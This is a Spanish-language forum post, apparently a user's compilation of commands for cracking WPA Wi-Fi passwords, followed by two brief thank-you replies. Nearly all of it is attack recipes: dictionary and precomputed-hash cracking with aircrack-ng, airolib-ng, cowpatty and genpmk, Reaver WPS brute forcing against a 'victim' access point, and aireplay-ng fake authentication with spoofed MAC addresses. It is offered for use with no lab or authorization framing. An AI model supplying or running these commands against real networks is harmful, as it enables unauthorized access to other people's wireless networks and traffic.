Les traigo este aporte, es una recopilación que hice de varios ataques, procesamiento/generación de diccionarios etc
Cracking WPA
* test with wireshark all your networks around with this filter
wps.wifi_protected_setup_state == 2
# airmon-ng start wlan0
# wireshark mon0&
Importar diccionario para WPA con airolib-ng
airolib-ng [db_name] [option [param]]
#airolib-ng crackwpa --import passwd /ruta/del/diccionario.txt
#airolib-ng crackwpa --import essid /archivo/con/el/essid
#airolib-ng crackwpa --stats
#airolib-ng crackwpa --clean all
#airolib-ng crackwpa --batch
#airolib-ng crackwpa --verify all
#aircrack-ng -r crackwpa archivo.cap
Cowpatty
*si el essid contiene espacios va entre comillas
*para hashear un diccionario se usa genpmk
#cowpatty -s [ESSID] -r archivo.cap -f /ruta/del/diccionario.txt
#cowpatty -s [ESSID] -r wpa.cap -d /ruta/del/diccionario/hasheado
Genpmk
*Generar el diccionario precomputado (hashes) para cowpatty, pyrt, etc
*Tener en cuenta que el argumento de -d podría no existir y se generaría
#genpmk -s [ESSID] -d /ruta/del/diccionario_en_Hash -f diccionario.txt
#genpmk -s [ESSID] -d [SSID] -f diccionario.txt
***Probar Contraseña***
# wpa_passphrase [ESSID] [password] > wpa.conf
# wpa_supplicant -Dwext -iwlan0 -c /ruta/del/wpa.conf
Pyrt
# cat [diccionario.txt] | sort | uniq | pw-inspector -m 8 -M 68 > dict.txt
#pyrt -e [essid] create_essid
#pyrt -f [diccionario.txt] import_passwords
#pyrt batchprocess
#aircrack-ng -w dict.txt file.cap
#airolib-ng testdb -import essid [essid]
#pyrt -e [essid] -f testdb export_hashdb
#aircrack-ng -r testdb file.cap
***DICCIONARIOS***
# cat [diccionario.txt] | sort | uniq | pw-inspector -m 8 -M 68 > dict.txt
pyrt -e [essid] -f [dictionary.txt] passthrough | cowpatty -d - -r [file.cap]
-s [essid]
Reaver
*To use reaver you need to check if victim has wps enabled and is chiper with
wpa
*then enable monitor mode and with mon0 or your new interface sniff with
wireshark and set filter to: wps.wifi_protected_setup_state == 2
*Then you got the victims with wps vuln
*Source: http://blog.andregasser.net/?p=243
# airmon-ng start wlan0
# airodump mon0 <- to find target
# reaver -i mon0 -b [Victim_BSSID] -vv
Fakeauth
# aireplay-ng --fakeauth 10 -e [ESSID] mon0
# aireplay-ng --fakeauth 10 -e [ESSID] -h [my mac or Spoofed_MAC_ADDRESS] mon0
Si se captura un xor packet
# airodump-ng --channel 1 mon0 --bssid [AP_Victim_MAC] --write [name.cap]
# aireplay-ng --fakeauth 10 mon0 -e [ESSID] -y [FILE.XOR]
Muy buen aporte, gracias por compartirlo. :)
Saludos
:) gracias, me tarde un ratito en hacer esta recopilación pero me da gústo saber que si les agrada, estoy buscando la que hice de sqli para sharearla